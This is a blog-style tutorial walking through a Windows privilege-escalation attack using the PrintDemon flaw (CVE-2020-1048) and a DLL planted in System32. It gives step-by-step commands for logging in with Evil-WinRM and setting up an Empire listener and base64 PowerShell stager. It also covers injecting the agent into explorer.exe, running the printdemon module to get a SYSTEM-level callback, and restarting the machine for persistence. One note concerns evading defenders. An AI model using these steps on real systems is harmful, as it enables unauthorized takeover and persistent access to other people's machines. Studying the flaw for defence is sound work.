DLL HIJACKING USING “INVOKE-PRINTDEMON” POWERSHELL MODULE
WHAT IS A DLL?
A DLL is a library that contains code and data that can be used by more than one program at the same time. As an example in windows operating system the netshell.dll DLL performs network connection functions, so that aids any program to use this DLL to implement all the functions of netshell.dll to the program which is currently in use.
So all we need to is that DLL contains executable code and most of the applications rely on DLL’s which are already installed in the system.
HOW CAN WE HIJACK THE DLL?
DLL Hijacking is a way for adversaries to execute malicious code on the system. For this to happen every application or a service in a windows environment looks for a number of DLL’s in order to function properly. The vulnerability opens up when the attempted DLL isn’t found from the location the application searched for where the attacker could place a malicious DLL on the same file path, so that when the application restarts it’ll execute the malicious code and do the programmed damage.
NOTE: IN THIS ARTICLE I’LL BE USING THE “CVE-2020–1048” WHICH IS THE PRINT SPOOLER PRIVILEDGE ESCALATION IT’S ALSO NAMED AS THE “PRINTDEMON”.
For this I’ll be using a powershell script called “Invoke-PrintDemon” to take advantage of 2 vulnerabilities, they are PrintDemon and Faxhell(A Fax service).
WHAT IS PRINT SPOOLER?
The primary component of the printing interface is the print spooler. The print spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The spooler is loaded at system startup and continues to run until the operating system is shut down.
FROM MICROSOFT
LINK1: https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler
I would like you to read the following article from “windows-internals” which they explain the PrintDemon and the printinf process.
LINK2: https://windows-internals.com/printdemon-cve-2020-1048/
Before I start talking about the practical way of hijacking a DLL, I would like to show you how to add and enumerate printer-drivers on a windows system
A BRIEF EXPLANAITION ON HOW TO ADD AND ENUMERATE PRINTER-DRIVERS
Before we enumerate any of the drivers we need to install a simple driver to make the process possible. I would use a basic Driver named “Generic / Text Only”. Open up your powershell as a standard user and enter the below command.
command : Add-PrinterDriver -Name “Generic / Text Only”
Since you have installed the “print driver” you are able to enumerate the installed drivers in a windows system.
commnad: Get-PrinterDriver
After that you are able to insert a “Printer-Port” and start enumerating the Ports which is used by the printer and you can also find more about this technique in the **LINK2**.
For this practical demonstration I’ll be using the “Empire-Framework” and the “Evil-WinRM”(Windows Remote Management) tools to accomplish the task.
BRIEF NOTE ABOUT “EVIL-WINRM”
It uses the standard SOAP based protocol that allows
hardware and operating systems from different vendors to work in conjuction with each other. This tool can be used to login to an operating system which has user-level account.
So before dive into DLL hijacking, let’s use “evil-winrm” to login to a windows operating system.
command: “evil-winrm -i {ip address} -u {username}”
As you can see I used evil-winrm with credentials to login to a system which prompted a powershell command line.
In the above image u could see that i have logged in as a user-level account.
Now let’s start the “Empire-Framework”. I’ll be starting the server and the client as well as the Starkiller(GUI Version) of the framework if its necessary in the end.
The above image shows how to start the server
The above image shows the client.
First lets create a ‘http’ listener and set a port for the listener to keep listening on the framework by using the following command.
command: uselistener http
command2: set port 9001
Then type “execute” to start the listener on the attacker machine.
Since we have created a listener we need to create stager to upload the agent to the target system. An agent is a process running on the target host that connects to the created listener.
To create a stager do the following steps.
commands:
- usestager multi/launcher
- set Listener http
- execute
As you can see that after executing these commands I got a powershell payload which is encoded in base64. In this exercise I have disabled windows defender to make things easier for you’ll and to understand the concept.
There are various ways to deliver the payload but for now lets just copy paste the payload on the powershell command line i got earlier using the “evil-winrm” tool.
In the above image you can see that I have pasted the payload on the windows system.
As you can see it has received a connection from the target host and created an agent on the system. :)
To get the list of agents on the framework type “agents”
The agent indicating with green colour is the only active agent on the system so we need to interact with above agent. For that use the following syntax: “interact {agent name}”
To make this a stable shell without any restrictions we might have to migrate to another process on the system. For that we could the ‘ps’ or ‘Get-Process’ command to list out the running process on the system.
From the list, I chose to use the “explorer” process since its one of the widley used process.
NOTE: better not to use this process on a real life operation since the blue team would instantly find out and kill the session.
To migrate to the above process use the following syntax: “psinject {listener name} {processID}”
Now we need to check the whether the system is vulnerable for the Invoke-PrintDemon. For this we could use a powershell command to confirm it.
command: “Get-ItemProperty -Path “HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion””
If the build is less than “windows 10 Build 2004” the system is vulnerable for the system.
As you can see the BuildNumber is “18362”. I googled the number and found out that the this system is “ Windows 10 version 1903”. So that makes this system vulnerable for the “Invoke-PrintDemon” priviledge escalation. :)
So now we could the use the POC using the powershell-empire framework. This allows an unprivileged user to gain system-level privileges through windows print spooler. This powershell module(Invoke-PrintDemon) basically prints a DLL named ualapi.dll, which is loaded to System32. The module then places a launcher in the registry, which executes code as SYSTEM on restart.
before we start the “printdemon” module we need to create a stager to make the agent work on the escalated user.
Since you have the base64 code which is also called the “LauncherCode” we could start the printdemon module.
module: “usemodule/powershell/privesc/printdemon”
set the base64 code on the LauncherCode
After setting up everything type “execute” to run the module
in order for the print job to have privileges to write to the System32 I have to restart the print spooler service, but the best thing to do is to restart the whole machine so on the process of restarting the machine the malicious DLL will be written on the System32 Our script is then written into the registry and will trigger the Fax service to initiate a SYSTEM level agent to call back to our Empire server.
To restart the system enter the following command on the newly created agent.
command: “usemodule management/restart”
After restarting the machine you should have persistence on the machine.
I’ll explain you’ll on how to Launch the “Invoke-PrintDemon” as a script command on the powershell-client on my next article.
SCRIPT_LINK: https://github.com/BC-SECURITY/Invoke-PrintDemon/blob/master/Invoke-PrintDemon.ps1
I hope you guys understood the concept of how to hijack a DLL using the “Invoke-PrintDemon” module. Thank you for reading.
Snowdox :)
